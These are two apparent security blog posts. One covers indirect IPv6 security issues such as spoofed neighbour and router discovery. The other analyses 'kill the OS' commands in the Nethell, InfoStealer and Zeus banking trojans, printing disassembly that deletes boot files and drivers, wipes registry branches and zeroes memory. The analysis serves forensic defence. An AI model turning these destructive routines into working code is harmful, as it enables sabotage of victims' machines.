IPv6 Security (III)

IPv6 in general brings lots of changes directly related to security. But not only these improve the security of the new IP protocol. In this post we will see how some of the features and changes comming with IPv6 affect the security of the protocol in an indirect manner.

Enhanced address space vs. ping sweeps
In IPv6 the default subnet size is 2^64 - which means it can exist of 18.446.744.073.709.551.616 hosts within one network.

With a 2GHz Dual Core machine connected to a 100MBit network a nmap scan (using the echo request/reply mechanism) for a /24 subnet takes 2.554 seconds. If we assume there is the same speed to the IPv6 remote network we want to scan it would take 5.835.714.585 years to scan the 2^64 subnet.

Network administrators face the problem that IPv6 addresses are not really friendly to remind. For practical reasons all the hosts in an IPv6 network will be in a DNS server. Thus the main target to find hosts in a remote network will be DNS servers.

Stateless Address/Router Configuration
This is a point which affects the security of IPv6 in a negative way. What is a real help for administrators can also be an advantage for attackers with the aim of gaining access to the infrastructure.

If there is a new machine in the net, it will generate its EUI-64 IPv6 address - but before assigning the address to the interface it will check with a request packet if this address is already used by another host to avoid conflicts.
Later on the host will ask in the local network for a router. The router will respond to that request and provide the necessary information in order to connect the host to e.g. the Internet.

All these automatic configuration mechanisms are based on trust, so everybody could spoof a message that says this address is already assigned, or respond to the router request to make a man-in-the middle attack.

The THC (The Hackers Choice) Group has proved these and more attacks in practice and released the code here . Also the presentation is truly worth a look.

The solution to this problem - SEcure Neighbor Discovery (SEND) is already discussed in 2005 in the RFC 3971 , but until now there is no implementation found in recent operating systems.

Some more attacks to IPv6 not only related to the local trust model can be found here .

Clemens Kurtenbach
S21sec e-crime

When a Bot master goes mad - Kill the OS

This time we are taking a close look about what things could happen with an infected computer when the running bot receives an specific command about to kill the Operating System. Not all type of bots usually have this functionality, but banking Trojans usually have. We will take three examples (InfoStealer, Zeus/Zbot and Nethell/Ambler), these are the most common Trojans where we've definitely found in their binaries the malicious code that is responsible for the Execution of Windows.

Nethell / Ambler:

Bot commands often can be observed with pure eyes in the binary as simple strings, however not as always trivial as in the case of Nethell:

Looking for the subroutine referencing to the above strings, we arrive to the code that is doing the dirty job:

mov esi, offset aCNtdetect_com ; "C:\\NTDETECT.COM"
push edi
push esi
call GetFileAttributesA
mov edi, SetFileAttributesA
and al, 0F8h
push eax
push esi
call edi
push esi
call DeleteFileA
mov esi, offset aCNtldr ; "C:\\ntldr"

The code above deletes the files NTDETECT.COM and NTLDR, before deletion, removes the Hidden/System/Read-Only attribute bits. The other botcommand, KILLWINANDREBOOT, calls this same subroutine + immediately tries to do a system reboot.

InfoStealer:

The way of InfoStealer is undoubtedly effective:

push offset aDrivers_sys ; "\\drivers\\*.sys"
push eax ; Dest
call ds:wcscat
push 1 ; hFindFile
push offset delete ; int
lea eax, [ebp+FileName]
push 98967Fh ; int
push eax ; lpFileName
call recursive_findfile
add esp, 18h
call reboot

The subroutine tries to delete each driver within the System32 directory, the first attempt is with a normal delete, in case it fails it is going to call the MoveFileEx API with the flag MOVEFILE_DELAY_UNTIL_REBOOT, which will delete the file upon startup.

InfoStealer also removes necessary registry keys for creating a logon session:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell = Explorer.exe
UIHost = logonui.exe
HKLM\SYSTEM\CurrentControlSet\Services\DcomLaunch\Parameters
ServiceDll = rpcss.dll
HKLM\SYSTEM\CurrentControlSet\Services\RpcSs\Parameters
ServiceDll = rpcss.dll

Zeus / Zbot:

Last but not least here comes the old Zeus. Considering that it requires the less code to execute, nevertheless it is the most aggressive and robust:

push eax

push 80000001h
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+50h]
mov esi, 80000002h
push esi
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+54h]
push esi
call ds:SHDeleteKeyA
push 3E8h
call ds:Sleep
xor eax, eax
push eax
push eax
push eax
push eax
mov eax, ds:buffer
push 0Eh
push dword ptr [eax+30h]
call write_read_namedpipe

It "just" deletes two kind of registry entries, but this will include WHOLE branches:

HKEY_CURRENT_USER,
HKEY_LOCAL_MACHINE\software
HKEY_LOCAL_MACHINE\system

The execution flow does not end up here. After the deletion is finished, it sends a 0E command to its pipe server, where the following code starts zeroing bytes of the virtual memory (4GB):

push 8007h
call eax ; <--- SetErrorMode, to ignore everything
xor eax, eax
mov [eax], eax
xor eax, eax ; from address 0x00000000 - 0xFFFFFFFF
loc_1: mov byte ptr [eax], 0 ; fill the memory with zeros
inc eax
jmp short loc_1

Invoking Zeus' method in our test environment resulted in a B.S.O.D (Blue Screen Of Death).

What could be the possible intention of an attacker to take the victim's computer offline? To disappear and hide all tracks, making further analysis harder? Talking about banking trojans, obviously it is not. As we have seen non of these methods lead to a significant data loss, the trojan binaries are not removed, neither registry startup entries. The point more probably for a phisher is to earn time. Taking the victim away from Internet connection - before the unwanted money transfer is realized and further actions could be taken.

Of course, knowing these informations is not proposed to give tips for anyone how to kill the Windows, indeed hope it may help to roll up some misterious case, and may help forensic analysis.

Jozsef Gegeny
S21sec e-crime